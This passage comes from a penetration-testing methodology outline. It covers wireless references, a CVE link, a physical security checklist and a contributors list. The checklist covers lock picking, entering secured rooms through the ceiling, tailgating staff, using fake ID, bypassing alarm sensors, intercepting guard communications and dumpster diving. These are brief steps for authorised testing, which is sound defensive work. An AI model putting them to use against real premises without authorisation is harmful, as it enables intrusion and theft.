25.3.6.2.6. PEAP Shmoocon2008 Wright & Antoniewicz

25.3.6.2.7. Active behavioral fingerprinting of wireless devices

25.3.6.3. Common Vulnerabilities and Exposures (CVE)

25.3.6.3.1. Vulnerabilities and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wireless

26. Physical Security

26.1. Building Security

26.1.1. Meeting Rooms

26.1.1.1. Check for active network jacks.

26.1.1.2. Check for any information in room.

26.1.2. Lobby

26.1.2.1. Check for active network jacks.

26.1.2.2. Does receptionist/guard leave lobby?

26.1.2.3. Accessible printers? Print a test page.

26.1.2.4. Obtain phone/personnel listing.

26.1.3. Communal Areas

26.1.3.1. Check for active network jacks.

26.1.3.2. Check for any information in room.

26.1.3.3. Listen for employee conversations.

26.1.4. Room Security

26.1.4.1. Resistance of lock to picking.

26.1.4.1.1. What types of lock are used in the building? Pin tumblers, padlocks, cabinet locks, dimple keys, proximity sensors?

26.1.4.2. Ceiling access areas.

26.1.4.2.1. Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?

26.1.5. Windows

26.1.5.1. Check windows/doors for visible intruder alarm sensors.

26.1.5.2. Check visible areas for sensitive information.

26.1.5.3. Can you video users logging on?

26.2. Perimeter Security

26.2.1. Fence Security

26.2.1.1. Attempt to verify that the whole of the perimeter fence is unbroken.

26.2.2. Exterior Doors

26.2.2.1. If there is no perimeter fence, determine whether exterior doors are secured, guarded and monitored, etc.

26.2.3. Guards

26.2.3.1. Patrol Routines

26.2.3.1.1. Analyse patrol timings to ascertain if any holes exist in the coverage.

26.2.3.2. Communications

26.2.3.2.1. Intercept and analyse guard communications. Determine whether the communication methods can be used to aid a physical intrusion.

26.3. Entry Points

26.3.1. Guarded Doors

26.3.1.1. Piggybacking

26.3.1.1.1. Attempt to closely follow employees into the building without having to show valid credentials.

26.3.1.2. Fake ID

26.3.1.2.1. Attempt to use fake ID to gain access.

26.3.1.3. Access Methods

26.3.1.3.1. Test 'out of hours' entry methods

26.3.2. Unguarded Doors

26.3.2.1. Identify all unguarded entry points.

26.3.2.1.1. Are doors secured?

26.3.2.1.2. Check locks for resistance to lock picking.

26.3.3. Windows

26.3.3.1. Check windows/doors for visible intruder alarm sensors.

26.3.3.1.1. Attempt to bypass sensors.

26.4. Office Waste

26.4.1. Dumpster Diving. Attempt to retrieve any useful information from the ToE's refuse. This may include printed documents, books, manuals, laptops, PDAs, USB memory devices, CDs, floppy discs, etc.

27. Final Report - template

28. Contributors

28.1. Matt Byrne (WirelessDefence.org)

28.1.1. Matt contributed the majority of the Wireless section.

28.2. Arvind Doraiswamy (Paladion.net)

28.2.1. Arvind kindly contributed the MySQL section, used when TCP port 3306 is found open.

28.3. Lee Lawson (Dns.co.uk)

28.3.1. Lee contributed the majority of the Cisco and Social Engineering sections.

28.4. Nabil OUCHN (Security-database.com)